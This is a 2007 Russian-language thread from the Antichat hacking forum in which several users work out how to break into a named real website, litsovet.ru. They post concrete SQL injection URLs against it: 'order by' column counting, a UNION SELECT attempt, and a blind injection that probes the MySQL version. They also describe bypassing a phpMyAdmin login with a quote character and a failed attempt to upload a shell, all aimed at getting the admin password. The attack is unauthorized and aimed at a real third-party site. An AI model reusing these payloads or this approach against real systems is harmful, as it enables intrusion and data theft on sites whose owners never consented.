Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Sql inj на сайте (https://forum.antichat.xyz/showthread.php?t=34818)

NighSh 06.03.2007 17:38
Sql inj на сайте
 
Всем снова привет =)
Вобщем начал я читать книги, статьи... чуток стал разбираться...
И вернулся все к тому же сайту- www.litsovet.ru
Там вроде есть SQL inj...
я с инекцией пока плохо знаком, но...
1 http://litsovet.ru/index.php/material.read?material_id=
(ставим кавычку получем вот такую фигню-
4¶ .4¶ ..Ў7¶staffЙВ’6¶ .htaccess9зГW¶kvit.htmIrз_W¶tz.zipВ• 6¶author.action.cphpЖmM¶ index.bakNзD\¶t.phpЗ�6¶ css›6¶files1ГИ6¶imagesВ”tВ phpMyAdminА¬7¶gallery.action.cphp7¶ index.phpQз®7¶journal.action.cphpЇ7¶ konkurs.download.cphp+Г°7¶ konkurs.download.php5+Г±7¶litob.action.cph p®Гх6¶ material.action.cphp¬В©Z¶ robots.txtз®6¶$publications.action.cphp±В[¶ regs.php‰vзa.php8Вr4¶$sounds.action.cp hpВ.oldЉUзPИВtempцЎВоT¶ journal.download.phpЂ®В@U¶ knop1.gifaзz”Дaaaaa&ГmyadminSРВ remЌ .info.php^uАэW¶ viewcooc.php9eАW¶index.php.currentЕ®PА tiny_mcez¦Ж]¶asd.htmlYіз9¶ captcha.phpd¶ mailtest.php9eА::¶imap.php№{зжb¶А kvitsb.htmзўf¶¬subscribe_confirm.phpљВ)
Это доказывает наличие уязвимости?!
Так же если в id= поставить "равенство" поста ну типа 964=965-1, то получим страницу 964...
Эм... проблема в том, что я пока не могу понять как искать поля =/
кто нить поможет?

Интересные вещи:
Там стоит Phpmyadmin, если в нем место логина поставить ковычку, то мы попадем в админку... тока с без привелегий(шелл залить не удалось =/ )
А ели обратится к ФТП этого сайта, и тоже вместо логина поставить ковычку, то поле логина просто исчезнет...
Вот...
просто хочу на примере разобраться в sql inj

Заранее спасибо =)
А еще спасибо тем, кто помог хоть чуток встать мне на правильный путь =)

aka PSIH 06.03.2007 17:44
если там не ставить кавычку то все-равно такая фигня вылазит, и это не sql-injection...
Просто криво написанный движок...
кстати в этой ошибке видны файлы лежать в директории... ;)

Sn@k3 06.03.2007 17:59
ггг накосяченый софт, кароче там типа листинг гг)

NighSh 06.03.2007 18:04
То есть хренушки мне а не иньекция?! (((
эм... блин, ну кому не влом, ну подскажите че делать то...
как добыть пасс админа без Xss =/
Пожалуйста =)))

NighSh 06.03.2007 18:26
а что такое CRLF injection?

Spyder 06.03.2007 18:27
какая то хрень если честно
http://litsovet.ru/index.php/material.read?material_id=1+order+by+31 - ошибка
http://litsovet.ru/index.php/material.read?material_id=1+order+by+30 - ошибки нет
НО
http://litsovet.ru/index.php/material.read?material_id=30+union+select+1,2,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30/*
так тоже ошибка =\

NighSh 06.03.2007 18:31
так все таки есть там иньекция =)))?!

c411k 06.03.2007 18:38
Цитата:
Сообщение от NighSh
так все таки есть там иньекция =)))?!
есть.
http://litsovet.ru/index.php/material.read?material_id=123201+and(ascii(substri ng(version(),1,1))>51)
мускул 3 ветки, так что юнион не работает..

+там по идее кривая читалка файлов, ты подума получше, может чтото сможешь намутить с ней ;)

NighSh 06.03.2007 18:38
эм... и еще если не сложно скажите, а какого рака если я в ПХП МОЙ АДМИН в логине ставлю ковычку, то обхажу авторизацию?

Spyder 06.03.2007 18:39
c411k, хех, точно
Просто совсем забыл про 3 ветку


Время: 02:02